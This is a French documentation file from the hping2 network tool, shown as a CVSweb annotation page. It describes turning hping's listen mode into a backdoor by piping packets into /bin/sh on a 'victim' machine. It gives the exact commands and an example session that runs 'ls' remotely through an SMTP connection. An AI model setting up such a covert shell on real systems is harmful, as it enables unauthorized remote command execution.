Annotation of embedaddon/hping2/docs/french/AS-BACKDOOR, revision 1.1

1.1     ! misho       1: hping peut être utilisé comme une backdoor (ndt : porte dérobée). Essayez
        !             2: juste l'option -9 (--listen) et redirigez via un tube dans /bin/sh :
        !             3: 
        !             4: Mettez hping en mode listen (ndt : d'écoute) sur le système victime.
        !             5: 
        !             6: victim# hping -I eth0 -9 mysign | /bin/sh
        !             7: 
        !             8: Chaque paquet qui contient "mysign" sera traité par hping, tous les octets
        !             9: qui suivent "mysign" dans les paquets seront envoyés dans la sortie
        !            10: standard, ainsi par exemple je serai capable d'exécuter des commandes en
        !            11: utilisant tous types de protocoles. Juste pour exemple je peux utiliser le
        !            12: démon smtpd pour exécuter 'ls' sur la victime.
        !            13: 
        !            14: evil$ telnet victim 25
        !            15: 
        !            16: Trying 192.168.1.1...
        !            17: Connected to nano (192.168.1.1).
        !            18: Escape character is '^]'.
        !            19: 220 nano.marmoc.net ESMTP Sendmail
        !            20: mysignls;
        !            21: 
        !            22: sur la victime vous verrez :
        !            23: 
        !            24: victim# hping -I eth0 -9 mysign | /bin/sh
        !            25: hping2 listen mode
        !            26: bin   cdrom  etc     home  local-home  mnt   root  tmp  var
        !            27: boot  dev    export  lib   lost+found  proc  sbin  usr
        !            28: : command not found
        !            29: 
        !            30: Comme vous pouvez le voir j'utilise 'ls;' puisque sinon le shell recevra
        !            31: juste ls^M. Le ";" force l'exécution de la commande (du moins avec bash et
        !            32: zsh, vérifiez votre shell pour plus d'informations).
        !            33: 
        !            34: Ceci fonctionne avec tous les types de paquets IP valides non filtrés, le
        !            35: niveau supérieur de protocole importe peu.
        !            36: 
        !            37: antirez <antirez@invece.org>

FreeBSD-CVSweb <freebsd-cvsweb@FreeBSD.org>